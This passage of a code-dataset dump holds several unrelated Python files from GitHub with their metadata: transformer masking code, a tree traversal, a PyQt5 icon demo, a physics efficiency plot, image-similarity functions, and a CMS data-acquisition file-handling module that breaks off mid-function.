tgt_key_padding_mask: :math:`(N, T)`.\n - memory_key_padding_mask: :math:`(N, S)`.\n\n Note: [src/tgt/memory]_mask ensures that position i is allowed to attend the unmasked\n positions. If a ByteTensor is provided, the non-zero positions are not allowed to attend\n while the zero positions will be unchanged. If a BoolTensor is provided, positions with ``True``\n are not allowed to attend while ``False`` values will be unchanged. If a FloatTensor\n is provided, it will be added to the attention weight.\n [src/tgt/memory]_key_padding_mask provides specified elements in the key to be ignored by\n the attention. If a ByteTensor is provided, the non-zero positions will be ignored while the zero\n positions will be unchanged. If a BoolTensor is provided, the positions with the\n value of ``True`` will be ignored while the position with the value of ``False`` will be unchanged.\n\n - output: :math:`(T, N, E)`.\n\n Note: Due to the multi-head attention architecture in the transformer model,\n the output sequence length of a transformer is same as the input sequence\n (i.e. target) length of the decode.\n\n where S is the source sequence length, T is the target sequence length, N is the\n batch size, E is the feature number\n\n Examples:\n >>> output = transformer_model(src, tgt, src_mask=src_mask, tgt_mask=tgt_mask)\n \"\"\"\n\n output = self.encoder(src, pos_encoding, rel_pos)\n return output\n\n def generate_square_subsequent_mask(self, sz: int) -> torch.Tensor:\n r\"\"\"Generate a square mask for the sequence. The masked positions are filled with float('-inf').\n Unmasked positions are filled with float(0.0).\n \"\"\"\n mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n return mask\n\n def _reset_parameters(self):\n r\"\"\"Initiate parameters in the transformer model.\"\"\"\n\n for p in self.parameters():\n if p.dim() > 1:\n torch.nn.init.xavier_uniform_(p)","repo_name":"bmanga/disentangled_attention","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":9734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"30244505918","text":"class Node:\n def __init__(self, value):\n self.right = None\n self.left = None\n self.val = value\n\n\n\ndef inorder_traversal(tree):\n current = tree\n values = []\n stack = []\n\n while True:\n if current:\n stack.append(current)\n current = current.left\n \n else:\n if len(stack) > 0:\n _v = stack.pop()\n values.append(_v.val)\n current = _v.right\n else:\n return values\n \n return values\n \n\nroot = Node(1)\nroot.left = Node(2)\nroot.left.left = Node(4)\nroot.left.right = Node(5)\nroot.right = Node(3)\nroot.right.left = Node(6)\nroot.right.right = Node(7)\n\n# x = inorder_traversal(root)\n# print(x)","repo_name":"farhan0581/gfgcodes","sub_path":"trees/inorder_wr.py","file_name":"inorder_wr.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5014269548","text":"# 0导包\nfrom PyQt5.Qt import *\nimport sys\n# 1.创建一个应用程序对象\napp = QApplication(sys.argv)\n\n# 2.1创建控件\nwindow = QWidget()\n# 2.2设置控件\nwindow.setWindowTitle(\"图标操作\")\nwindow.resize(500, 500)\n\nbtn = QPushButton(window)\nico = QIcon(r\"D:\\Desktop\\xxx.png\")\n# 图标设置\nbtn.setIcon(ico)\nqsize = QSize(50, 50)\nbtn.setIconSize(qsize)\nprint(btn.icon())\nprint(btn.iconSize())\n\n\n\n# 2.3展示控件\nwindow.show()\n# 3.应用程序的执行,进入到消息循环,程序不会退出(无限循环)\nsys.exit(app.exec_())","repo_name":"02605/PyQt5","sub_path":"35-QAbsBtu-图标操作.py","file_name":"35-QAbsBtu-图标操作.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11125494938","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys, os, glob\nimport matplotlib.tri as tri\nimport numpy.ma as ma\nfrom ROOT import TFile, TTree\n\ndeg = np.pi / 180.0\n\npath = \"./results/dz\"\nif len(sys.argv) > 1:\n path = sys.argv[1]\nfiles = glob.glob(path + \"/*.root\")\nfiles.sort()\n\ndzs = np.zeros(len(files))\neff = np.zeros(len(files))\neff_sipm = np.zeros(len(files))\n\ndef get(filename):\n # Open root file and retreive tree\n file = TFile(filename)\n n = 0\n try:\n n = file.Get(\"wicoBackHits\").GetEntriesFast()\n except:\n pass\n n_sipm = 0\n for i in xrange(64):\n try:\n hits = file.Get(\"g4sipmHits-%d\" % i)\n if hits != None:\n n_sipm += hits.GetEntriesFast()\n except:\n pass\n # Determine nTot\n gps = file.Get(\"generalParticleSourceMessenger\")\n gps.GetEntry(0)\n nParticles = gps.nParticles\n # Determin dz.\n model = file.Get(\"famousModel\")\n model.GetEntry(0)\n dz = model.dz\n #\n file.Close()\n return n, n_sipm, nParticles, dz\n\nfor i, file in enumerate(files):\n n_hit, n_sipm, n_tot, dz = get(file)\n dzs[i] = dz\n eff[i] = n_hit / float(n_tot)\n eff_sipm[i] = n_sipm / float(n_tot)\n \nidx = np.argsort(dzs)\neff = eff[idx]\neff_sipm = eff_sipm[idx]\n \nplt.plot(dzs, eff * 100.0, label=\"Winston cone exit, optimum dz = %.3f mm\" % dzs[np.argmax(eff)])\nplt.plot(dzs, eff_sipm * 100.0, label=\"SiPM, optimum dz = %.3f mm\" % dzs[np.argmax(eff_sipm)])\nplt.xlabel(\"dz / mm\")\nplt.ylabel(\"efficiency / %\")\nplt.legend(loc=\"upper right\")\nplt.show()","repo_name":"ntim/famous","sub_path":"sim/plots/dz.py","file_name":"dz.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27632916582","text":"import random\n\ndef random_set(length, min=1, max=10000000):\n result = set()\n while len(result) < length:\n while True:\n n = random.randint(min, max)\n if n not in result:\n result.add(n)\n break\n return result\n\ndef random_list(length, min=1, max=100000000):\n result = []\n while len(result) < length:\n n = random.randint(min, max)\n result.append(n)\n return result","repo_name":"chaosannals/trial-python","sub_path":"olddemo/trial/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11821855161","text":"import cv2\nimport numpy as np\nfrom numpy import average, dot\nfrom scipy import linalg\nfrom skimage.metrics import structural_similarity as compare_ssim\n\ndef hist_similar(lh, rh):\n assert len(lh) == len(rh)\n hist = sum(1 - (0 if l == r else float(abs(l - r)) / max(l, r)) for l, r in zip(lh, rh)) / len(lh)\n return hist\n\ndef calc_similar(imgA, imgB):\n calc_sim = hist_similar(\n cv2.calcHist(imgA, [3], None, [256], [0, 256]),\n cv2.calcHist(imgB, [3], None, [256], [0, 256])\n )\n return calc_sim\n\ndef image_similarity_vectors_via_numpy(image1, image2):\n # images = [cv2.cvtColor(image1, cv2.COLOR_RGB2GRAY), cv2.cvtColor(image2, cv2.COLOR_RGB2GRAY)]\n images = [image1, image2]\n vectors = []\n norms = []\n for image in images:\n vector = []\n for pixel_tuple in image:\n vector.append(average(pixel_tuple))\n vectors.append(np.array(vector))\n # linalg=linear(线性)+algebra(代数),norm则表示范数\n # 求图片的范数??\n norms.append(linalg.norm(vector, 2))\n a, b = vectors\n a_norm, b_norm = norms\n # dot返回的是点积,对二维数组(矩阵)进行计算\n res = dot(a / a_norm, b / b_norm)\n return res\n\n# 感知哈希算法\ndef pHash(img):\n img = cv2.resize(img, (32, 32))\n # 转换为灰度图\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # 将灰度图转为浮点型,再进行dct变换\n dct = cv2.dct(np.float32(gray))\n # opencv实现的掩码操作\n dct_roi = dct[0:8, 0:8]\n\n hash = []\n avreage = np.mean(dct_roi)\n for i in range(dct_roi.shape[0]):\n for j in range(dct_roi.shape[1]):\n if dct_roi[i, j] > avreage:\n hash.append(1)\n else:\n hash.append(0)\n return hash\n\n# 返回值为汉明距离,距离越大,相似度越低\ndef cmpHash(hash1, hash2):\n n = 0\n # hash长度不同则返回-1代表传参出错\n assert len(hash1) == len(hash2)\n # 遍历判断\n for i in range(len(hash1)):\n # 不相等则n计数+1,n最终为相似度\n if hash1[i] != hash2[i]:\n n = n + 1\n return n\ndef similarity_by_phash(imgA, imgB):\n return 1 / cmpHash(pHash(imgA), pHash(imgB))\n\n'''\n效果较好的:\n\n'''\ndef getSimilarity(imgA, imgB, method):\n similarity = None\n if method == 'hist':\n similarity = calc_similar(imgA, imgB)\n elif method == 'ssim':\n similarity = compare_ssim(imgA, imgB, multichannel=True)\n elif method == 'phash':\n similarity = similarity_by_phash(imgA, imgB)\n elif method == 'cos':\n similarity = image_similarity_vectors_via_numpy(imgA, imgB)\n # print(similarity)\n return similarity","repo_name":"CaoAnda/Multi-image_stitching","sub_path":"similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"35948424960","text":"import sys,traceback\nimport os,stat\nimport time,datetime\nimport shutil\nimport json\nimport logging\nimport zlib\nimport subprocess\nimport threading\n#import fcntl\n\nfrom inotifywrapper import InotifyWrapper\nimport inotify._inotify as inotify\nimport _zlibextras as zlibextras\n\nES_DIR_NAME = \"TEMP_ES_DIRECTORY\"\n#file types\nUNKNOWN,OUTPUTJSD,DEFINITION,STREAM,INDEX,FAST,SLOW,PROCMON,OUTPUT,STREAMERR,STREAMDQMHISTOUTPUT,INI,EOLS,BOLS,EOR,COMPLETE,DAT,PDAT,PJSNDATA,PIDPB,PB,CRASH,MODULELEGEND,PATHLEGEND,INPUTLEGEND,BOX,QSTATUS,FLUSH,PROCESSING = list(range(29))\nTO_ELASTICIZE = [STREAM,INDEX,OUTPUT,STREAMERR,STREAMDQMHISTOUTPUT,EOLS,EOR,COMPLETE,FLUSH]\nTEMPEXT = \".recv\"\nSTREAMERRORNAME = 'streamError'\nTHISHOST = os.uname()[1]\n\ndef setHostUtils(host):\n global THISHOST\n THISHOST=host\n\njsdCache = {}\n\nbw_cnt = 0\n\n##Output redirection class\n#class stdOutLog:\n# def __init__(self):\n# self.logger = logging.getLogger(self.__class__.__name__)\n# def write(self, message):\n# self.logger.debug(message)\n#class stdErrorLog:\n# def __init__(self):\n# self.logger = logging.getLogger(self.__class__.__name__)\n# def write(self, message):\n# self.logger.error(message)\n\ndef decodecstr(raw):return raw if isinstance(raw,str) else raw.decode(\"utf-8\") if raw is not None else \"\"\n\n\n #on notify, put the event file in a queue\nclass MonitorRanger:\n\n def __init__(self,recursiveMode=False):\n self.logger = logging.getLogger(self.__class__.__name__)\n self.eventQueue = False\n self.inotifyWrapper = InotifyWrapper(self,recursiveMode)\n self.queueStatusPath = None\n self.queueStatusPathMon = None\n self.queueStatusPathDir = None\n self.queuedLumiList = []\n self.maxQueuedLumi=-1\n #max seen/closed by anelastic thread\n self.maxReceivedEoLS=-1\n self.maxClosedLumi=-1\n self.numOpenLumis=-1\n self.maxCMSSWLumi=-1\n self.maxLSWithOutput=-1\n self.lock = threading.Lock()\n\n self.output_bw=0\n self.lumi_bw=0\n\n self.data_size_ls_num = 0\n self.data_size_val = 0\n self.data_size_last_update = 0\n\n self.statsCollectorThread = None\n\n def startStatsCollector(self):\n self.statsCollectorThread = threading.Thread(target=self.statsCollector)\n self.statsCollectorThread.daemon=True #set as daemon thread (not blocking process termination)\n self.statsCollectorThread.start()\n\n def statsCollector(self):\n global bw_cnt\n bw_cnt_time=None\n while True:\n new_time = time.time()\n if bw_cnt_time is not None:\n d_t = new_time-bw_cnt_time\n if d_t!=0:\n self.output_bw=bw_cnt//d_t\n bw_cnt=0\n bw_cnt_time=new_time\n\n #refresh last completed lumi BW\n if self.data_size_ls_num>0:\n if new_time - self.data_size_last_update < 60:\n self.lumi_bw=self.data_size_val/23.31\n else:\n self.lumi_bw=0.\n if self.queueStatusPathDir and not os.path.exists(self.queueStatusPathDir):\n self.logger.info('no queue status dir yet.')\n else:\n self.updateQueueStatusFile(\".statsCollector\")\n time.sleep(23.4)\n\n def register_inotify_path(self,path,mask):\n self.inotifyWrapper.registerPath(path,mask)\n\n def start_inotify(self):\n self.inotifyWrapper.start()\n\n def stop_inotifyTimeout(self,timeout):\n self.logger.info(\"MonitorRanger: Stop inotify wrapper\")\n self.inotifyWrapper.stop()\n self.logger.info(\"MonitorRanger: Join inotify wrapper\")\n self.inotifyWrapper.join(timeout)\n if self.inotifyWrapper.isAlive():\n self.logger.info(\"MonitorRanger: Inotify wrapper join timeout (\"+str(timeout)+\")\")\n return False\n else:\n self.logger.info(\"MonitorRanger: Inotify wrapper returned\")\n return True\n\n def stop_inotify(self):\n self.logger.info(\"MonitorRanger: Stop inotify wrapper\")\n self.inotifyWrapper.stop()\n self.logger.info(\"MonitorRanger: Join inotify wrapper\")\n self.inotifyWrapper.join()\n self.logger.info(\"MonitorRanger: Inotify wrapper returned\")\n\n def process_default(self, event):\n self.logger.debug(\"event: %s on: %s\" %(str(event.mask),event.fullpath))\n if self.eventQueue:\n\n if self.queueStatusPath is not None:\n if self.checkNewLumi(event):\n self.eventQueue.put(event)\n else:\n self.eventQueue.put(event)\n\n def setEventQueue(self,queue):\n self.eventQueue = queue\n\n def checkNewLumi(self,event):\n if event.fullpath.endswith(\"_EoLS.jsn\"):\n try:\n queuedLumi = int(os.path.basename(event.fullpath).split('_')[1][2:])\n self.lock.acquire()\n if queuedLumi not in self.queuedLumiList:\n if queuedLumi>self.maxQueuedLumi:\n self.maxQueuedLumi=queuedLumi\n self.queuedLumiList.append(queuedLumi)\n self.lock.release()\n self.updateQueueStatusFile(\".checkNewLumi\")\n else:\n self.lock.release()\n #skip if EoL for LS in queue has already been written once (e.g. double file create race)\n return False\n except Exception as ex:\n self.logger.warning(\"Problem checking new EoLS filename: \"+str(os.path.basename(event.fullpath)) + \" error:\"+str(ex))\n try:self.lock.release()\n except:pass\n #delete associated BoLS file\n try:\n os.unlink(event.fullpath[:event.fullpath.rfind(\"_EoLS.jsn\")]+\"_BoLS.jsn\")\n except:\n pass\n elif event.fullpath.endswith(\"_BoLS.jsn\"):\n try:\n queuedLumi = int(os.path.basename(event.fullpath).split('_')[1][2:])\n if queuedLumi>self.maxCMSSWLumi:\n self.maxCMSSWLumi = queuedLumi\n self.updateQueueStatusFile(\".checkNewLumi\")\n except:\n pass\n #not passed to the queue\n return False\n return True\n\n def notifyLumi(self,ls,maxReceivedEoLS,maxClosedLumi,numOpenLumis):\n if self.queueStatusPath is None:return\n self.lock.acquire()\n if ls is not None and ls in self.queuedLumiList:\n self.queuedLumiList.remove(ls)\n self.maxReceivedEoLS=maxReceivedEoLS\n self.maxClosedLumi=maxClosedLumi\n self.numOpenLumis=numOpenLumis\n self.lock.release()\n self.updateQueueStatusFile(\".notifyLumi\")\n\n def notifyMaxLsWithOutput(self,ls):\n self.maxLSWithOutput=max(ls,self.maxLSWithOutput)\n\n def setQueueStatusPath(self,path,monpath):\n self.queueStatusPath = path\n self.queueStatusPathMon = monpath\n self.queueStatusPathDir = path[:path.rfind('/')]\n\n def updateQueueStatusFile(self,tmpsuffix):\n if self.queueStatusPath is None:return\n num_queued_lumis = len(self.queuedLumiList)\n if not os.path.exists(self.queueStatusPathDir):\n self.logger.error(\"No directory to write queueStatusFile: \"+str(self.queueStatusPathDir))\n else:\n self.logger.info(\"Update status file - queued lumis:\"+str(num_queued_lumis)+ \" EoLS:: max queued:\"+str(self.maxQueuedLumi) \\\n +\" un-queued:\"+str(self.maxReceivedEoLS)+\" Lumis:: last closed:\"+str(self.maxClosedLumi) \\\n + \" num open:\"+str(self.numOpenLumis) + \" max LS in cmssw:\"+str(self.maxCMSSWLumi))\n #write json\n doc = {\"numQueuedLS\":num_queued_lumis,\n \"maxQueuedLS\":self.maxQueuedLumi,\n \"numReadFromQueueLS:\":self.maxReceivedEoLS,\n \"maxClosedLS\":self.maxClosedLumi,\n \"numReadOpenLS\":self.numOpenLumis,\n \"CMSSWMaxLS\":self.maxCMSSWLumi,\n \"maxLSWithOutput\":self.maxLSWithOutput,\n \"outputBW\": self.output_bw,\n \"lumiBW\": self.lumi_bw\n }\n \n if self.queueStatusPath is not None:\n attempts=3\n while attempts>0:\n try:\n #copy to main hltd\n tmpjson=json.dumps(doc)\n with open(self.queueStatusPath+tmpsuffix+TEMPEXT,\"w\") as fp:\n json.dump(doc,fp)\n os.rename(self.queueStatusPath+tmpsuffix+TEMPEXT,self.queueStatusPath)\n #copy to monitoring directory\n try:\n shutil.copyfile(self.queueStatusPath,self.queueStatusPathMon)\n except:\n pass\n break\n except Exception as ex:\n attempts-=1\n if attempts==0:\n self.logger.error(\"Unable to open/write \" + self.queueStatusPath)\n self.logger.exception(ex)\n else:\n self.logger.warning(\"Unable to write status file, with error:\" + str(ex)+\".retrying...\")\n time.sleep(0.05)\n\n\nclass fileHandler(object):\n def __eq__(self,other):\n return self.filepath == other.filepath\n\n def __getattr__(self,name):\n if name not in self.__dict__:\n if name in [\"dir\",\"ext\",\"basename\",\"name\"]: self.getFileInfo()\n elif name in [\"filetype\"]: self.filetype = self.getFiletype()\n elif name in [\"run\",\"ls\",\"stream\",\"index\",\"pid\",\"tid\"]: self.getFileHeaders()\n elif name in [\"data\"]: self.data = self.getData()\n elif name in [\"definitions\"]: self.getDefinitions()\n elif name in [\"host\"]: self.host = THISHOST\n if name in [\"ctime\"]: self.ctime = self.getTime('c')\n if name in [\"mtime\"]: self.mtime = self.getTime('m')\n if name in [\"mtimems\"]: self.mtimems = self.getTimeEms('m')\n return self.__dict__[name]\n\n def __init__(self,filepath,filetype=None):\n self.logger = logging.getLogger(self.__class__.__name__)\n self.filepath = filepath\n if filetype: self.filetype = filetype\n self.outDir = self.dir\n self.mergeStage = 0\n self.inputs = []\n self.inputData = []\n\n def getTime(self,t):\n if self.exists():\n if t == 'c':\n dt=os.path.getctime(self.filepath)\n elif t == 'm':\n dt=os.path.getmtime(self.filepath)\n time_fmt = datetime.datetime.utcfromtimestamp(dt).isoformat()\n return time_fmt\n return None\n\n def getTimeEms(self,t):\n if self.exists():\n if t == 'c':\n timestamp=os.path.getctime(self.filepath)\n elif t == 'm':\n timestamp=os.path.getmtime(self.filepath)\n return timestamp*1000\n return None\n\n def getFileInfo(self):\n self.dir = os.path.dirname(self.filepath)\n self.basename = os.path.basename(self.filepath)\n self.name,self.ext = os.path.splitext(self.basename)\n\n def getFiletype(self,filepath = None):\n if not filepath: filepath = self.filepath\n filename = self.basename\n name,ext = self.name,self.ext\n if ext==TEMPEXT:return UNKNOWN\n name = name.upper()\n if \"/mon\" not in filepath:\n if ext == \".dat\" and \"_PID\" not in name: return DAT\n if ext == \".dat\" and \"_PID\" in name: return PDAT\n if ext == \".jsndata\" and \"_PID\" in name: return PJSNDATA\n if ext == \".ini\" and \"_PID\" in name: return INI\n if ext == \".jsd\" and \"OUTPUT_\" in name: return OUTPUTJSD\n if ext == \".jsd\" : return DEFINITION\n if ext == \".jsn\":\n if STREAMERRORNAME.upper() in name: return STREAMERR\n elif \"_STREAM\" in name and \"_PID\" in name: return STREAM\n elif \"_INDEX\" in name and \"_PID\" in name: return INDEX\n elif \"_CRASH\" in name and \"_PID\" in name: return CRASH\n elif \"_EOLS\" in name: return EOLS\n elif \"_BOLS\" in name: return BOLS\n elif \"_EOR\" in name: return EOR\n if ext==\".jsn\":\n if \"_STREAM\" in name and \"_PID\" not in name: return OUTPUT\n if name.startswith(\"QUEUE_STATUS\"): return QSTATUS\n if name.startswith(\"SLOWMONI\"): return SLOW\n if name.startswith(\"PROCMON\"): return PROCMON\n if ext==\".pb\":\n #if \"_PID\" not in name: return PB\n if \"_PID\" not in name: return UNKNOWN\n else: return PIDPB\n if ext == \".ini\" and \"/mon\" in filepath: return INI\n if name.endswith(\"COMPLETE\"): return COMPLETE\n if ext == \".fast\" in filename: return FAST\n if name.startswith(\"MICROSTATELEGEND\"): return MODULELEGEND\n if name.startswith(\"PATHLEGEND\"): return PATHLEGEND\n if name.startswith(\"INPUTLEGEND\"): return INPUTLEGEND\n if \"boxes\" in filepath : return BOX\n if filename == 'flush': return FLUSH\n if filename == 'processing': return PROCESSING\n return UNKNOWN\n\n\n def getFileHeaders(self):\n filetype = self.filetype\n name,ext = self.name,self.ext\n splitname = name.split(\"_\")\n if filetype in [STREAM,INI,PDAT,PJSNDATA,PIDPB,CRASH]: self.run,self.ls,self.stream,self.pid = splitname\n elif filetype == SLOW:\n try:\n slowname,self.ls,self.pid,self.tid = splitname\n except:\n slowname,self.ls,self.pid = splitname\n self.tid=None\n elif filetype == FAST:\n try:\n self.run,self.pid,self.tid = splitname\n except:\n self.run,self.pid = splitname\n self.tid=None\n\n elif filetype == PROCMON:\n try:\n pmonname,self.ls,self.pid,self.tid = splitname\n except:\n pmonname,self.ls,self.pid = splitname\n self.tid=None\n\n elif filetype in [DAT,PB,OUTPUT,STREAMERR,STREAMDQMHISTOUTPUT]: self.run,self.ls,self.stream,self.host = splitname\n elif filetype == INDEX: self.run,self.ls,self.index,self.pid = splitname\n elif filetype in [EOLS,BOLS]: self.run,self.ls,self.eols = splitname\n else:\n self.logger.warning(\"Bad filetype: %s\" %self.filepath)\n self.run,self.ls,self.stream = [None]*3\n\n def getData(self):\n if self.ext == '.jsn': return self.getJsonData()\n elif self.filetype == BOX: return self.getBoxData()\n return None\n\n def getBoxData(self,filepath = None):\n if not filepath: filepath = self.filepath\n try:\n with open(filepath,'r') as fi:\n data = json.load(fi)\n except IOError as e:\n data = {}\n except Exception as e:\n # self.logger.exception(e)\n self.logger.warning('Box parse error:'+str(e))\n data = {}\n return data\n\n #get data from json file\n def getJsonData(self,filepath = None):\n if not filepath: filepath = self.filepath\n try:\n with open(filepath) as fi:\n data = json.load(fi)\n #except json.scanner.JSONDecodeError as e:\n except json.JSONDecodeError as e:\n self.logger.exception(e)\n data = {}\n except Exception as e:\n self.logger.exception(e)\n data = {}\n return data\n\n def setJsdfile(self,jsdfile):\n self.jsdfile = jsdfile\n if self.filetype in [OUTPUT,STREAMDQMHISTOUTPUT,CRASH,STREAMERR]: self.initData()\n\n def initData(self):\n defs = self.definitions\n self.data = {}\n if defs:\n self.data[\"data\"] = [self.nullValue(f[\"type\"]) for f in defs]\n\n def nullValue(self,ftype):\n if ftype == \"integer\": return \"0\"\n elif ftype == \"string\": return \"\"\n else:\n self.logger.warning(\"bad field type %r\" %(ftype))\n return \"ERR\"\n\n def checkSources(self):\n data,defs = self.data,self.definitions\n for item in defs:\n fieldName = item[\"name\"]\n index = defs.index(item)\n if \"source\" in item:\n source = item[\"source\"]\n sIndex,ftype = self.getFieldIndex(fieldName) #TODO:pyflakes gives warning..\n data[index] = data[sIndex]\n\n def getFieldIndex(self,field):\n defs = self.definitions\n if defs:\n index = next((defs.index(item) for item in defs if item[\"name\"] == field),-1)\n ftype = defs[index][\"type\"]\n return index,ftype\n\n\n def getFieldByName(self,field):\n index,ftype = self.getFieldIndex(field)\n data = self.data[\"data\"]\n if index > -1:\n value = int(data[index]) if ftype == \"integer\" else str(data[index])\n return value\n else:\n self.logger.warning(\"bad field request %r in %r\" %(field,self.definitions))\n return None\n\n def setFieldByName(self,field,value,warning=True):\n index,ftype = self.getFieldIndex(field)\n data = self.data[\"data\"]\n if index > -1:\n data[index] = value\n return True\n else:\n if warning==True:\n self.logger.warning(\"bad field request %r in %r\" %(field,self.definitions))\n return False\n\n def setBaseFieldByName(self,field,value):\n self.data[field]=value\n\n #get definitions from jsd file\n def getDefinitions(self):\n if self.filetype in [STREAM]:\n #try:\n self.jsdfile = self.data[\"definition\"]\n #except:\n # self.logger.error(\"no definition field in \"+str(self.filepath))\n # self.definitions = {}\n # return False\n elif not self.jsdfile:\n self.logger.warning(\"jsd file not set\")\n self.definitions = []\n return False\n if self.jsdfile not in jsdCache:\n jsdCache[self.jsdfile] = self.getJsonData(self.jsdfile)\n self.definitions = jsdCache[self.jsdfile][\"data\"]\n #self.definitions = self.getJsonData(self.jsdfile)[\"data\"]\n return True\n\n def setDefinitions(self,jsdfile):\n if self.filetype in [STREAM]:\n #try:\n self.jsdfile = jsdfile\n #except:\n # self.logger.error(\"no definition field in \"+str(self.filepath))\n # self.definitions = {}\n # return False\n elif not self.jsdfile:\n self.logger.warning(\"jsd file not set\")\n self.definitions = []\n return False\n if self.jsdfile not in jsdCache:\n jsdCache[self.jsdfile] = self.getJsonData(self.jsdfile)\n self.definitions = jsdCache[self.jsdfile][\"data\"]\n #self.definitions = self.getJsonData(self.jsdfile)[\"data\"]\n return True\n\n def deleteFile(self,silent=False):\n #return True\n filepath = self.filepath\n if silent==False:\n self.logger.info(filepath)\n if os.path.isfile(filepath):\n try:\n os.remove(filepath)\n except Exception as e:\n self.logger.exception(e)\n return False\n return True\n\n def moveFile(self,newpath,copy = False,adler32=False,silent=False, createDestinationDir=True, missingDirAlert=True, missingDirAssert=False, updateFileInfo=True):\n checksum=1\n #if not self.exists(): return True,checksum #should return False (below)\n oldpath = self.filepath\n newdir = os.path.dirname(newpath)\n\n if not os.path.exists(oldpath):\n self.logger.error(\"Source path does not exist: \" + oldpath)\n return False,checksum\n\n self.logger.info(\"%s -> %s\" %(oldpath,newpath))\n retries = 5\n #temp name with temporary host name included to avoid conflict between multiple hosts copying at the same time\n newpath_tmp = newpath+'_'+THISHOST+TEMPEXT\n while True:\n try:\n #few attempts at creating destination directory \n dir_missing_attempts=5\n while not os.path.isdir(newdir):\n dir_missing_attempts-=1\n if missingDirAssert:\n self.logger.fatal('Missing destination dir '+str(newdir) + '. Terminating script')\n os._exit(2)\n if dir_missing_attempts>=0 and createDestinationDir==False:\n continue\n if createDestinationDir==False:\n if silent==False and missingDirAlert==True:\n self.logger.error(\"Unable to transport file \"+str(oldpath)+\". Destination directory does not exist: \" + str(newdir))\n else:\n self.logger.warning(\"Unable to transport file \"+str(oldpath)+\". Destination directory does not exist: \" + str(newdir))\n return False,checksum\n elif dir_missing_attempts<0:\n self.logger.error(\"Unable to make directory \"+str(newdir))\n return False,checksum\n try:\n os.makedirs(newdir)\n except:\n #repeated check if dir was created in the meantime\n if not os.path.isdir(newdir):\n os.makedirs(newdir)\n\n if adler32:checksum=self.moveFileAdler32(oldpath,newpath_tmp,copy)\n else:\n if copy: shutil.copy(oldpath,newpath_tmp)\n else:\n shutil.move(oldpath,newpath_tmp)\n break\n\n except (OSError,IOError) as e:\n if silent==False:\n if isinstance(e, IOError) and e.errno==2:\n self.logger.warning(\"Error in attempt to copy/move file to destination \" + newpath + \":\" + str(e))\n else:\n self.logger.exception(e)\n retries-=1\n if retries == 0:\n if silent==False:\n #do not print this warning if directory was removed\n if os.path.isdir(newdir):\n self.logger.error(\"Failure to move file \"+str(oldpath)+\" to \"+str(newpath_tmp))\n else:\n self.logger.warning(\"Failure to move file \"+str(oldpath)+\" to \"+str(newpath_tmp)+'.Target directory is gone')\n return False,checksum\n else:\n time.sleep(0.5)\n except Exception as e:\n self.logger.exception(e)\n raise e\n #renaming\n retries = 5\n while True:\n try:\n os.rename(newpath_tmp,newpath)\n break\n except (OSError,IOError) as e:\n if silent==False:\n if isinstance(e, IOError) and e.errno==2:\n self.logger.warning(\"Error encountered in attempt to copy/move file to destination \" + newpath + \":\" + str(e))\n elif isinstance(e, OSError) and e.errno==18:\n self.logger.warning(\"failed attempt to rename \" + newpath_tmp + \" to \" + newpath + \" error: \"+ str(e))\n else:\n self.logger.exception(e)\n retries-=1\n if retries == 0:\n if silent==False:\n #do not print this warning if directory was deleted\n if os.path.isdir(newdir):\n self.logger.error(\"Failure to rename temporary file \"+str(newpath_tmp)+\" to \"+str(newpath))\n else:\n self.logger.warning(\"Failure to rename temporary file \"+str(newpath_tmp)+\" to \"+str(newpath)+'.Target directory is gone')\n return False,checksum\n else:\n time.sleep(0.5)\n except Exception as e:\n self.logger.exception(e)\n raise e\n\n if updateFileInfo:\n self.filepath = newpath\n self.getFileInfo()\n return True,checksum\n\n #move file (works only on src as file, not directory)\n def moveFileAdler32(self,src,dst,copy):\n global bw_cnt\n if os.path.isdir(src):\n raise shutil.Error(\"source `%s` is a directory\")\n\n if os.path.isdir(dst):\n dst = os.path.join(dst, os.path.basename(src))\n\n try:\n if os.path.samefile(src, dst):\n raise shutil.Error(\"`%s` and `%s` are the same file\" % (src, dst))\n except OSError:\n pass\n\n #initial adler32 value\n adler32c=1\n #calculate checksum on the fly\n with open(src, 'rb') as fsrc:\n with open(dst, 'wb') as fdst:\n\n length=16*1024\n while 1:\n buf = fsrc.read(length)\n if not buf:\n break\n adler32c=zlib.adler32(buf,adler32c)\n fdst.write(buf)\n bw_cnt+=len(buf)\n\n #copy mode bits on the destionation file\n st = os.stat(src)\n mode = stat.S_IMODE(st.st_mode)\n os.chmod(dst, mode)\n\n if copy==False:os.unlink(src)\n return adler32c\n\n\n def mergeDatInputs(self,destinationpath,doChecksum,dropAtFU=False):\n global bw_cnt\n dirname = os.path.dirname(self.filepath)\n ccomb=1\n dst = None\n adler32accum=1\n json_size=0\n copy_size=0\n file_created=False\n for input in self.inputs:\n nproc = int(input.getFieldByName('Processed'))\n nerr = int(input.getFieldByName('ErrorEvents'))\n ifile = input.getFieldByName('Filelist')\n ifilecksum = int(input.getFieldByName('FileAdler32'))\n ifilesize = int(input.getFieldByName('Filesize'))\n\n #no file to merge if n processed = 0\n if nproc==0:\n continue\n\n #if any of 'proper' files has checksum set to -1, disable the check and substitute -1 in output json\n if ifilecksum == -1:\n ccomb = -1\n doChecksum = False\n if doChecksum:\n ccomb = zlibextras.adler32_combine(ccomb,ifilecksum,ifilesize)\n\n json_size+=ifilesize\n\n #if going to merge, open input file\n if dst is None and not dropAtFU:\n try:\n dst = open(destinationpath,'wb')\n except IOError as ex:\n if ex.errno==2:\n 